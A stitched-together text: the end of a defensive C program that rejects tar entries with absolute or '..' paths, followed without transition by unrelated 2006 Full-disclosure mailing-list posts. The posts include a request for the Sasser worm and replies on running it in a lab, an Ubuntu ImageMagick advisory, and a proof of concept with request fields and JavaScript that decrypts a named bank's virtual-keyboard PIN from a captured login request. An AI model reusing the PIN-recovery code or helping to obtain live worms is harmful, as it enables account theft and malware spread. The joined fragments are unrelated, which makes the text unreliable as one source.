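    TAR_DEPRECATED_NAMES,    /* typeflag 'N' (GNUTYPE_NAMES): obsolete, refuse it */
    TAR_NAME_ESCAPES,        /* entry name is absolute or contains ".." */
    TAR_LINK_ESCAPES         /* hard/symlink target is absolute or contains ".." */
};

/* Copy a 100-byte, NUL-padded (possibly unterminated) field into a C string. */
static void field100(const unsigned char *hdr, size_t off, char out[101]) {
    memcpy(out, hdr + off, 100);
    out[100] = '\0';
}

/* Conservative test: a path may leave the extraction root if it is absolute or
 * has any ".." component. Over-strict for symlinks nested in subdirectories,
 * which is the safe direction for an extractor to err in. */
int path_escapes(const char *p) {
    if (p[0] == '/')
        return 1;
    for (const char *s = p; ; ) {
        const char *e = strchr(s, '/');
        size_t n = e ? (size_t)(e - s) : strlen(s);
        if (n == 2 && s[0] == '.' && s[1] == '.')
            return 1;
        if (!e)
            return 0;
        s = e + 1;
    }
}

/* Decide from one header block alone whether an extractor should act on it. */
enum tar_verdict check_tar_header(const unsigned char hdr[TAR_BLOCK]) {
    char name[101], linkname[101];
    unsigned char type = hdr[OFF_TYPEFLAG];
    field100(hdr, OFF_NAME, name);
    field100(hdr, OFF_LINKNAME, linkname);

    if (type == 'N')
        return TAR_DEPRECATED_NAMES;
    if (path_escapes(name))
        return TAR_NAME_ESCAPES;
    if ((type == '1' || type == '2') && path_escapes(linkname))   /* hard / sym link */
        return TAR_LINK_ESCAPES;
    return TAR_OK;
}

/* Build a constructed header for the demo. Only the inspected fields are filled,
 * so this is not a valid archive member (no size, mode or checksum). */
void make_header(unsigned char hdr[TAR_BLOCK], const char *name, char type,
                 const char *linkname) {
    memset(hdr, 0, TAR_BLOCK);
    strncpy((char *)hdr + OFF_NAME, name, 100);
    hdr[OFF_TYPEFLAG] = (unsigned char)type;
    strncpy((char *)hdr + OFF_LINKNAME, linkname, 100);
}

/* Convenience: build a constructed header and check it in one step. */
enum tar_verdict verdict_for(const char *name, char type, const char *linkname) {
    unsigned char hdr[TAR_BLOCK];
    make_header(hdr, name, type, linkname);
    return check_tar_header(hdr);
}

int main(void) {
    static const char *label[] = { "ok", "deprecated GNUTYPE_NAMES record",
                                   "entry name escapes root", "link target escapes root" };
    printf("%s\n", label[verdict_for("docs/readme.txt", '0', "")]);
    printf("%s\n", label[verdict_for("names", 'N', "")]);
    printf("%s\n", label[verdict_for("cfg", '2', "../../outside.txt")]);
    return 0;
}
```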
Re: [Full-disclosure] Sasser or other nasty worm needed
I doubt schools have CLOSED LAB. I would like to know where the budget comes from, for this type of network. If so, then every school district board needs one.. :)-

On 11/27/06, K F (lists) [EMAIL PROTECTED] wrote:

> Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? It's not like he is intentionally letting it loose on the entire school LAN.
>
> -KF
>
> [EMAIL PROTECTED] wrote:
>
>> Chris - I don't know what to make of your "please reply off-list; I'm not a member" comment. It's almost as ridiculous as what you are requesting.
>>
>> If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district.
>>
>> Speaking as a network engineer for a large midwestern school district, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out, I'll be making a point of asking who the computer teachers are in that building.
>>
>> You want to teach these kids a lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network.
>>
>>> I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful.
>>>
>>> Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member.
>>>
>>> Thank you,
>>> Chris
>>>
>>> mail2web - Check your email from the web at http://mail2web.com/ .
Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards and Phishing Banks (fwd)
-----Original Message-----
From: Gadi Evron [mailto:[EMAIL PROTECTED]]
Sent: Monday, November 27, 2006 2:35 PM
To: Debasis Mohanty
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards and Phishing Banks (fwd)

> On Mon, 27 Nov 2006, Debasis Mohanty wrote:
>> More than a year Old (3rd August, 2005) - Defeating CITI-BANK Virtual Keyboard Protection
>> http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0142.html
>> http://hackingspirits.com/vuln-rnd/Defeat-CitiBank-VK.zip
>> http://xforce.iss.net/xforce/xfdb/21727
>
> I hear buffer overflows were invented quite a few years back, too. :)
>
> That makes most new bof's irrelevant!
>
> Gadi.

Nah !! They have just become so common to hear or read ;)

Btw - The last post was not meant to get into some kind of argument but to point out a different method to defeat such a mechanism.

Regards,
-d

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Gadi Evron
Sent: Sunday, November 26, 2006 12:18 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Defeating Image-Based Virtual Keyboards and Phishing Banks (fwd)

Copied from a post by Noam Rathaus on the SecuriTeam Blogs, following up a post by HispaSec.

This is about breaking virtual keyboard implementations, and the encryption some of them use (most of them send the data in clear text with the image). HispaSec was the reference by which we found the bank's site as one using a virtual keyboard.

http://blogs.securiteam.com/index.php/archives/678
http://hispasec.com/laboratorio/cajamurcia_en.htm

Gadi.
Quoting:

Recently, I stumbled upon a post by HispaSec showing off a screen shot trojan (http://hispasec.com/laboratorio/cajamurcia_en.htm) which nicely showed how a trojan horse can, utilizing key stroke capture and screenshot capture, grab a user's PIN number fairly easily, and wondered why they are taking this approach when the PIN numbers can be easily retrieved by sniffing the data sent by the user to the banking site, even though they are encrypted.

Image based keyboards (or virtual keyboards) were invented to make life harder for banking or phishing trojan horses (specifically key-stroke loggers or key loggers); some even suggested they be used specifically to avoid these trojan horses. The bad guys adapted to this technology and escalated. Now the trojan horses take screenshots of where the mouse pointer is to determine what number was clicked on.

Thing is, it is often unnecessary, as most implementations of this technique that we looked into (meaning, not all) were flawed. Instead of sending the remote image and waiting for the key-stroke information to be sent back to the server (the technique against which the on-click pointer-location screenshots described above were used), some banks send the PIN number in cleartext, while others encrypt it; one such example is cajamurcia. Even when encryption is used, banks tend to implement it badly, making it easy to recover the PIN number from the encrypted form.

I investigated a bit more on how cajamurcia handles such PIN strokes (with virtual keyboards) and I noticed something strange: they take the timestamp of their server (cajamurcia) and send it to you - this already poses a security problem - and this timestamp is then used to encrypt the PIN number you entered.

This would have been a good idea if the timestamp was not sent back to the server, making it hard or semi-hard to guess the timestamp used to encrypt the data, but at the same time making it harder for the server to know what timestamp was provided to the client (unless they store it inside their session information). Anyhow, as it is sent back to the server, we have everything we need to decrypt the data (PIN number).

PoC:

A request to the server would look like:

OPERACION=0002
CAJA=2043
CAMINO=2043
PGDESTI=CORP
BROKER=SI
VRS=001
PAN=2043123456
SELLO=16100616012569
CL=1161006956
PINV3=si
PANA=2043
PANB=123456
PIN=BBCB6E341C56C6B2
IDIOMA=01

We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL being the timestamp and PIN being the encrypted form of the PIN number. If we feed these into the following JS code:

https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js

    // Turn a hex string (optionally "0x"-prefixed) into the raw byte string des() expects.
    function hexToString (h) {
      var r = "";
      for (var i = (h.substr(0, 2) == "0x") ? 2 : 0; i < h.length; i += 2) {
        r += String.fromCharCode(parseInt(h.substr(i, 2), 16));
      }
      return r;
    }

    calcula = '1161006956';                         // the CL timestamp from the request
    ciphertext = hexToString('0xBBCB6E341C56C6B2'); // the PIN field from the same request
    // des() is the routine shipped in the bank's MOD.js linked above; the key is
    // eight digits of the timestamp, and 0 / 1 select decrypt / CBC mode.
    var cleartext = des(calcula.substr(2, 8), ciphertext, 0, 1, "");
    console.debug(cleartext);

We will get our original PIN number. This isn't necessarily easier, as it requires data capture, which isn't always easy, but screen captures usually require either an OCR, or manual labor, which the above
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006, Peter Dawson wrote:

> I doubt schools have CLOSED LAB. I would like to know where the budget comes from, for this type of network. If so, then every school district board needs one.. :)-

some do. schools partnered with, or using the curriculum of, the Center for System Security and Information Assurance (www.cssia.org) come to mind. i'm sure there are others.

Rick
[Full-disclosure] [USN-386-1] ImageMagick vulnerability
===
Ubuntu Security Notice USN-386-1           November 28, 2006
imagemagick vulnerability
CVE-2006-5868
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.10:
  libmagick6  6:6.2.3.4-1ubuntu1.5

Ubuntu 6.06 LTS:
  libmagick9  6:6.2.4.5-0.6ubuntu0.4

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Daniel Kobras discovered multiple buffer overflows in ImageMagick's SGI file format decoder. By tricking a user or an automated system into processing a specially crafted SGI image, this could be exploited to execute arbitrary code with the user's privileges.

Updated packages for Ubuntu 5.10:
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006, [EMAIL PROTECTED] wrote:

>> so when you go to mcdonalds and hand over your $5 for your MCbig meal, do you consider the repercussions of supporting an industry which pays low wages, is under-staffed, and promotes world-hunger by using enough grain to feed a continent, etc...?
>
> WTF does that have to do with the topic? Unless you want to make the point that often, the McDonald's staff fails to use a level of food-preparation hygiene that matches the computer-security hygiene requirements to work with known malware?

it seemed to me that you were arguing a reason for not distributing the binary was the guy is (not) clued enough to run a 'closed lab' without screwing up... making this a 'we shouldn't support this because we do not know this person is responsible' approach. so the context of my statement relates to consistency of accountability.

>> do *you* know where to find a copy?
>
> Yes.
>
>> did you always?
>
> Yes.

i'm sorry, but i have a hard time believing this.

>> have you always been able to configure a network to talk via EIGRP?
>
> No, because when I first got on the net, RFC1058 was still 4 years in the future. So it wasn't always possible, because the option didn't always exist.

and once it did there was a point in time in which you learned. you learned because you had access to information. someone else provided this information.

>> There are a lot of people who are of the opinion that if you have to ask where to find a copy of Sasser, you're not clued enough to be trusted with a copy.
>>
>> perhaps the next time you need a doctor, the one you find will laugh at you with the same sense of elitism you demonstrate.
>
> Did I say I was one of the "lot of people"? Did you notice that I was replying *in the context of KF's comments* saying "It's cool because it's in a closed lab"?

i must've missed that part. i jumped into this because i was once a student at university who benefited from this type of 'closed lab learning environment.'

you are absolutely correct that something could go wrong, but fear of failure ought not keep one from trying. i'm reminded of Roosevelt's saying:

"It is not the critic who counts: not the man who points out how the strong man stumbles or where the doer of deeds could have done better. The credit belongs to the man who is actually in the arena, whose face is marred by dust and sweat and blood, who strives valiantly, who errs and comes up short again and again, because there is no effort without error or shortcoming, but who knows the great enthusiasms, the great devotions, who spends himself for a worthy cause; who, at the best, knows, in the end, the triumph of high achievement, and who, at the worst, if he fails, at least he fails while daring greatly, so that his place shall never be with those cold and timid souls who knew neither victory nor defeat."

cheers,
Rick
[Full-disclosure] FWD: RE: [Dailydave] Symantec Blackberry Whitepaper. (fwd)
---------- Forwarded message ----------
Date: Mon, 27 Nov 2006 22:01:16 -0600 (CST)
From: J.A. Terranson [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: RE: [Dailydave] Symantec Blackberry Whitepaper.

Someone was kind enough to send it to me, so I am returning the favor for those who may still be looking for it:

http://www.mfn.org/~measl/blackberry.security.pdf

Enjoy!

--
Yours,
J.A. Terranson
[EMAIL PROTECTED]
0xBD4A95BF

"Surely the larger lesson learned from that day is that other men, all over the world, took inspiration not from the heroism of the rescuers in New York or the passengers flying over Pennsylvania, but from the 19 hijackers - the twisted brilliance of their scheme and their willingness to sacrifice their lives to make a political and, as they saw it, religious statement."

Richard Corliss/Time Magazine 11 Aug 2006
Re: [Full-disclosure] Sasser or other nasty worm needed
Yeah, old computers at schools are often given away for recycling.

On Mon, Nov 27, 2006 at 10:42:14PM -0500, Matthew Flaschen wrote:

> What budget? Every school that would have a networking class also has obsolete computers. Take a dozen, reformat them, put on an unpatched version of Windows, pull out or disable wifi, and connect them all to a switch (also probably available second-hand). Ensure neither computers nor switch are connected to any other network. Sure, you have to be sure not to f* it up, but it doesn't cost anything. Set-up sasser on one by moving it off a CD-R. Wait. :)
>
> This should cost little or nothing.
>
> Matt Flaschen
>
> Peter Dawson wrote:
>> I doubt schools have CLOSED LAB. I would like to know where the budget comes from, for this type of network. If so, then every school district board needs one.. :)-

--
http://chedder.hacked.in
cheesebox.terroristorganization.info
"You don't exist. Go away"